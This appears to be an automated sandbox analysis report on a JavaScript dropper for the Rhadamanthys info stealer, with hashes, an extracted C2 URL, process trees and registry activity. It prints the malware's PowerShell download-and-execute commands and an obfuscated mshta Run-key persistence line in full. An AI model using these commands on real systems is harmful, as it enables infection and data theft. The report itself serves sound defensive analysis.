Analysis
-
max time kernel
95s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
Resource
win10v2004-20241007-en
General
-
Target
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
-
Size
82KB
-
MD5
03844efc838d98e3a3aa6f935a2ff1db
-
SHA1
11c08db7fa610ff1a9e2bf7fb5e34015ceceec4f
-
SHA256
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98
-
SHA512
a34ed6ea22b9f6c1ebbae01d15fec736612039b6ab2d45984ef65a5cf53046be44d5e97dbb160735634c2c18103f0751782db47e5f00ace65d73591d85128928
-
SSDEEP
768:7AK3GmGyO9RsGGx5osXrmsGaO95b9iyCfxAO111y21NHvlZupREEpRfr5onZWRUX:GZeGX2unjA06
Malware Config
Extracted
rhadamanthys
https://185.196.8.68:9367/ab43097ee4f6e091aed46f79/88pw46v5.ki88g
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4512 created 2988 4512 RegSvcs.exe 50 PID 2056 created 2988 2056 RegSvcs.exe 50 -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 2544 powershell.exe 6 2544 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderlt-82 = "mshta \"javascript:bs=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(bs[2])[bs[0]](bs[1], 0, true);close();kd=new ActiveXObject('Scripting.FileSystemObject');kd.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderl-65 = "schtasks /run /tn Defenderl-65" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 bitbucket.org 6 bitbucket.org -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2544 set thread context of 4512 2544 powershell.exe 91 PID 2544 set thread context of 2056 2544 powershell.exe 92 PID 2544 set thread context of 1740 2544 powershell.exe 93 PID 2544 set thread context of 3524 2544 powershell.exe 94 PID 2544 set thread context of 2096 2544 powershell.exe 95 PID 2544 set thread context of 3928 2544 powershell.exe 96 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 4512 RegSvcs.exe 4512 RegSvcs.exe 2056 RegSvcs.exe 2056 RegSvcs.exe 4304 openwith.exe 4304 openwith.exe 4304 openwith.exe 4304 openwith.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe Token: SeRestorePrivilege 3500 dw20.exe Token: SeBackupPrivilege 3500 dw20.exe Token: SeBackupPrivilege 3500 dw20.exe Token: SeBackupPrivilege 3500 dw20.exe Token: SeBackupPrivilege 3500 dw20.exe Token: SeBackupPrivilege 3252 dw20.exe Token: SeBackupPrivilege 3252 dw20.exe Token: SeBackupPrivilege 3476 dw20.exe Token: SeBackupPrivilege 3476 dw20.exe Token: SeBackupPrivilege 2320 dw20.exe Token: SeBackupPrivilege 2320 dw20.exe Token: SeIncreaseQuotaPrivilege 2544 powershell.exe Token: SeSecurityPrivilege 2544 powershell.exe Token: SeTakeOwnershipPrivilege 2544 powershell.exe Token: SeLoadDriverPrivilege 2544 powershell.exe Token: SeSystemProfilePrivilege 2544 powershell.exe Token: SeSystemtimePrivilege 2544 powershell.exe Token: SeProfSingleProcessPrivilege 2544 powershell.exe Token: SeIncBasePriorityPrivilege 2544 powershell.exe Token: SeCreatePagefilePrivilege 2544 powershell.exe Token: SeBackupPrivilege 2544 powershell.exe Token: SeRestorePrivilege 2544 powershell.exe Token: SeShutdownPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeSystemEnvironmentPrivilege 2544 powershell.exe Token: SeRemoteShutdownPrivilege 2544 powershell.exe Token: SeUndockPrivilege 2544 powershell.exe Token: SeManageVolumePrivilege 2544 powershell.exe Token: 33 2544 powershell.exe Token: 34 2544 powershell.exe Token: 35 2544 powershell.exe Token: 36 2544 powershell.exe Token: SeIncreaseQuotaPrivilege 2544 powershell.exe Token: SeSecurityPrivilege 2544 powershell.exe Token: SeTakeOwnershipPrivilege 2544 powershell.exe Token: SeLoadDriverPrivilege 2544 powershell.exe Token: SeSystemProfilePrivilege 2544 powershell.exe Token: SeSystemtimePrivilege 2544 powershell.exe Token: SeProfSingleProcessPrivilege 2544 powershell.exe Token: SeIncBasePriorityPrivilege 2544 powershell.exe Token: SeCreatePagefilePrivilege 2544 powershell.exe Token: SeBackupPrivilege 2544 powershell.exe Token: SeRestorePrivilege 2544 powershell.exe Token: SeShutdownPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeSystemEnvironmentPrivilege 2544 powershell.exe Token: SeRemoteShutdownPrivilege 2544 powershell.exe Token: SeUndockPrivilege 2544 powershell.exe Token: SeManageVolumePrivilege 2544 powershell.exe Token: 33 2544 powershell.exe Token: 34 2544 powershell.exe Token: 35 2544 powershell.exe Token: 36 2544 powershell.exe Token: SeIncreaseQuotaPrivilege 2544 powershell.exe Token: SeSecurityPrivilege 2544 powershell.exe Token: SeTakeOwnershipPrivilege 2544 powershell.exe Token: SeLoadDriverPrivilege 2544 powershell.exe Token: SeSystemProfilePrivilege 2544 powershell.exe Token: SeSystemtimePrivilege 2544 powershell.exe Token: SeProfSingleProcessPrivilege 2544 powershell.exe Token: SeIncBasePriorityPrivilege 2544 powershell.exe Token: SeCreatePagefilePrivilege 2544 powershell.exe Token: SeBackupPrivilege 2544 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3196 wrote to memory of 2544 3196 wscript.exe 82 PID 3196 wrote to memory of 2544 3196 wscript.exe 82 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 4512 2544 powershell.exe 91 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 2056 2544 powershell.exe 92 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 1740 2544 powershell.exe 93 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 3524 2544 powershell.exe 94 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 2096 2544 powershell.exe 95 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2544 wrote to memory of 3928 2544 powershell.exe 96 PID 2096 wrote to memory of 3500 2096 Msbuild.exe 97 PID 2096 wrote to memory of 3500 2096 Msbuild.exe 97 PID 2096 wrote to memory of 3500 2096 Msbuild.exe 97 PID 3928 wrote to memory of 3252 3928 Msbuild.exe 98 PID 3928 wrote to memory of 3252 3928 Msbuild.exe 98 PID 3928 wrote to memory of 3252 3928 Msbuild.exe 98 PID 3524 wrote to memory of 3476 3524 RegSvcs.exe 99 PID 3524 wrote to memory of 3476 3524 RegSvcs.exe 99 PID 3524 wrote to memory of 3476 3524 RegSvcs.exe 99 PID 1740 wrote to memory of 2320 1740 RegSvcs.exe 100 PID 1740 wrote to memory of 2320 1740 RegSvcs.exe 100 PID 1740 wrote to memory of 2320 1740 RegSvcs.exe 100 PID 4512 wrote to memory of 1284 4512 RegSvcs.exe 102 PID 4512 wrote to memory of 1284 4512 RegSvcs.exe 102
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2988
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1284
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4512
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2056
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9164⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9164⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
315B
MD569acc92e6df5c35cf75eded8f61ddeaa
SHA1b405090a2f92f85490705dcf77a6461ad85e7e20
SHA256da3437f337aca0e1f8d7b187abcd9112d88beddde8ab8ae5aa8a8ab91b6e9698
SHA5129b83a6ef14372d9e229beb69c1b1ede6f348fb51925205f99f705808db6331c5aab32bd57fc786c61647cbb94f7e4bd236dc9f4fc26be4c1ffc7a35e7619a508
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82